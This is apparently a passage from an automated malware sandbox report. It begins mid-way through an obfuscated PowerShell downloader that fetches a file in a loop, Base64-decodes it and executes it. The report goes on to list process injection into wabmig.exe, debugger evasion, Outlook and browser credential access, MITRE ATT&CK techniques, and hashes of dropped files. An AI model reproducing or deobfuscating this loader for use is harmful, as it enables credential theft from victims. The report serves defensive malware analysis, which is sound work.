o.rbancH mero andelCente in r= Klan Asper[LimedNLaughe eratt Peri. P ddSpha meHjtelc CfiruSvirprb osoiBa,letbr ndyMisfaPforlarTemeroAtr.rtUndupoFrilucTaleho P.otlOdyssTProvoyD.ryap TacteVandk]Pichu:Thure:BeautT MenglQua.estaktl1P ten2Inter ');$remplacer=$Birgittineres[0];$Fedtparadoks= (Brokfugle 'Unsai$P,islgLandbl SkilOD akobCaptiaUmu,iLbesla:Repulb Do mr RestI DumrNBara k ekanETilba= ConinBl kpe Mod wMaren-HelliOForbrbCep aJTebree Remoc Ce ttRugek ProffSUntreY Fe lSHva,rtBles ejuvelmOvera.ByggenStablEAfkriTTenni.gr,llwRe tbeUnmelB ImpuCpreselAdvo iFickleFincanSl.raT');$Fedtparadoks+=$Fuldende[1];Undergrounds ($Fedtparadoks);Undergrounds (Brokfugle 'sprug$Tekstb Amp rNondii idacn DyrekKrakeeSilde.UdkigHParageDictiaOverbdCoveneStranrSemaes gley[Bolsj$UndtaTPoll,r Selvi Yenie,oncon apreHusbosNovia]Skuff=Elekt$ AutoPTavserkn,eleCellutIsarie leganA,rorcDegr ec armd Pavs ');$Unlustie=Brokfugle 'Alpha$hummeb prarCongriPargenByst kVoicee Unna. ScapDSten,o Rd gwPas onMagtflP epao osenaCau edKewpiF BettiForbilPoo retemp.(.rush$H mosrUnarbe SubcmAcacapBemaelRetlia.npoac Sl teHemitrPtero, Unan$ Bu,yMLibrauSljfelMo,tat P nti StertKon eu,astsbU.ageePosserDorm.cDeleguasseml NetvaHaematAlgocaPrg i)Blaan ';$Multituberculata=$Fuldende[0];Undergrounds (Brokfugle 'Inden$LevangvelseLDotteoPhiloBKimona puduLOlib :staalmFysi aFrankaEn.elnLiquaEDrmm.dAustasRigmnNOutmaaPhiloVSupernNon,uEAa eaNTv stEGio,d=C.tiz(AurocTStrygE HoveSredeft Matr-Broodp OutpaRg,omtUnhidhPerox Slo $Perfem IsopUMultilEn het ooniI,oborT VellUBro.tb KameER,altRBeskyc lounu Ae.olSolsoa Tendt DesmAfolkt) Morg ');while (!$Maanedsnavnene) {Undergrounds (Brokfugle 'Fo.lb$CordegUgleplHovedoTox fbSlu pabyl,elMehta:KentlOUforssbiofocGaditiWeedalSenatlDavace mi rr evike,edarr Hydr=Renc $AmatrtTankerArithuForvie Pros ') ;Undergrounds $Unlustie;Undergrounds (Brokfugle 'DiffeSD,miat .dkla hatcrBonm,tlamae-,huntSMesollMar ieTopsteQuattpRe en Teni.4 Sere ');Undergrounds (Brokfugle 'Landi$LovemgP.seklKev.noOphicbdermaa SovelG dst:pseudM LeadaCorboaCandlnBaunge B erdYderpsZwec nBe eea Ste vlowbrnAkilleCrustnS adseDusac=Hjrem(DemokTGensie,tencsCarelt Pol -TeisbP NatiaPulp tPalath Slas Pe,ma$A,itaMoverwu P.delUndert oncoiasmuntKoketuGagerbSprogeRenssr aldcImpreuZarislTi,traEkstet onia umbr) R.me ') ;Undergrounds (Brokfugle 'At ar$Br degTutenl bejdoEncrubUdradaN ckwlKuldk:IatroUUsdelrCh,leeTelefdMin,ie.rimol SyntiAlfa gKlagehFusioe ammed dmejeTapotrtrian2 iddl5Patin3Huggi=gymna$Sylv g StorlChamaoTiletbH lleaStatelGynia: Out.fTha soDamnarV racb Ha,mrSkrhauopvargLachreViderrF rbumExtiro Jourt Am li HorovBogoreSplinrAada i R tsnSog egPreheeAllonnPharmsTrans+Menne+Ward %Helot$TawdrBTi,cti PengrPla.dg ,otoiPro ot.rillt Besei Prewn Pel eSladdr Opu,eBleg,sPanto.Aftonciambko Phytu LgtenFirebt P,es ') ;$remplacer=$Birgittineres[$Uredeligheder253];}$Kildetekst=347054;$Combing=28457;Undergrounds (Brokfugle ' Udfa$A yatgKlasslSt luoAurocb RaadaReflelSmelt:BetonMMarkroBesladFahretSevrdaTabitgHi epe StifaRadionIdepolHelsigMax ls Poly Nonsp=Attra StemnG Spaae sammtho er-UdklkC UnvaoSurd.n TorfttirosePay,en ColltTeneb ort$TarteMLiomyuFremtl Kn ttArbejiLys,ntggebguFascib BlodeUnderrWhe lc K lkuAbsenl IncoaKor,htPrst aUndun ');Undergrounds (Brokfugle 'Nonas$ProavgObsidllappeobibcob Gr.baFlleslSemiv:LaengKRigesrUudtmy KkkedA,natsUmptei OkselPrte dZoproeIdiocnUskad1Advok5Cradl3Asylr Kuleg= kinn Overr[ ndelS,ntelySubpesNon atwistoeHexa mAntag.StatsC,rejloOffennMyoatvDevase Sal rp erotIsvin]Medic:Cyclo:SydafFLeukorPointoErnyam KramBSubcoaSicilsBonseeSegme6Whiff4GunvoSPreistSvi trTilraiGiftsn oyetgrante(Skden$InterMMangloSpis,d rogntTrisaasmakkg Terce B,rtaBa,innVolatlfastagAfrunsVov,l) Pi r ');Undergrounds (Brokfugle 'Cisju$Expergp loclRafl.o MisebTriplaJoloalOverb:B uesSPr hayRangemCul iaAdj nsRespekAn,teiCecidnUnpioeMiscisSepar Pewte= acti Hexob[UnderS DeciyVicersPhonotLim,aeLetf m ecov.BonmoT Op.yeKamrex Thert Emis.IsolaEPrebonInfracBaggroQuippd Ala.iUtugtnAlarmgM lds] S mm:Behan:Klok.A PreaSAne oCTill.IChambIEmanc. NvniGSnu,peCounttPyromS CrootOvercrStatuisirinn oalgFilt ( rval$BunseK MetarTungmy aculdI.dsksDaalaiFor,alJ lefd PreieStudenl.mph1Reobt5Daunt3 Boli) Tska ');Undergrounds (Brokfugle ' Slvs$Fluesg Ekahl L.ziounspab eutia En.ml B me:BebopOMortipSamkviSupersRegretEkstrhNervuoBradyc TiggoNammom Refei,ervad yppea Schnen.vem= Tilg$D sgoSStillyafstamFrdigaCh rosPractkNedruiLaanenni.ole etscsde mi.RoutosSmedeuBa pebOptagsSlyngtMi.rorReguiiUnelenIn regVskes(Hedeb$I dgaK grapiForudlSol,edCen reUninttsporeePen ukTrom sLe hetExpen,Unint$WaistC UindoReviemOwldobAden iGullanslettgDigly)Deedi ');Undergrounds $Opisthocomidae;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\milieuretterne.Kak && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2604
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POJD0XBWI2NQYTY8X8M9.temp

Filesize
7KB

MD5
d6b4b36567b9be3b9f3bb0b0fc688398

SHA1
92c64549148e5a08644e31d3ea295f5f67d17bd9

SHA256
6f8fe27b325f6b8e60c9c2292f681700687cc86e87e4b71f4085a87a8bf60fd2

SHA512
620183a6feb8fb214cc40c90ba51048e3e34e9879a3c0292c13d191a4120732fe1c7f0400e1c1b50e00ba72af5c45b3e14a831c02393d5468d8d0fb6f137aaf6

Download Submit
C:\Users\Admin\AppData\Roaming\milieuretterne.Kak

Filesize
488KB

MD5
8c0cc2cf2382e090c1e1b3e9a2e45cff

SHA1
22c5cc586fa705cc581dbd5874f036d52928ef83

SHA256
24a4e246f47a90f80dcc8d17573d209d4ad5e9dfbc9c565d291356d726dd6c52

SHA512
2b3b5594d9de25ac1e07b24f7b1e2d339308adcf235abced31394a899eb137e8b5042f768fa3f7b5a70d551ecc377dc6a23cc33d1c0b68c47d21bd0e39dc8164

Download Submit
memory/2308-42-0x0000000000810000-0x00000000066A2000-memory.dmp

Filesize
94.6MB

Download
memory/2308-22-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2308-20-0x0000000000810000-0x00000000066A2000-memory.dmp

Filesize
94.6MB

Download
memory/2356-12-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

Filesize
4KB

Download
memory/2356-14-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-11-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

Filesize
4KB

Download
memory/2356-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-8-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-43-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2356-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Filesize
9.6MB

Download
memory/2356-5-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2740-19-0x0000000006750000-0x000000000C5E2000-memory.dmp

Filesize
94.6MB

Download

Analysis

Sharing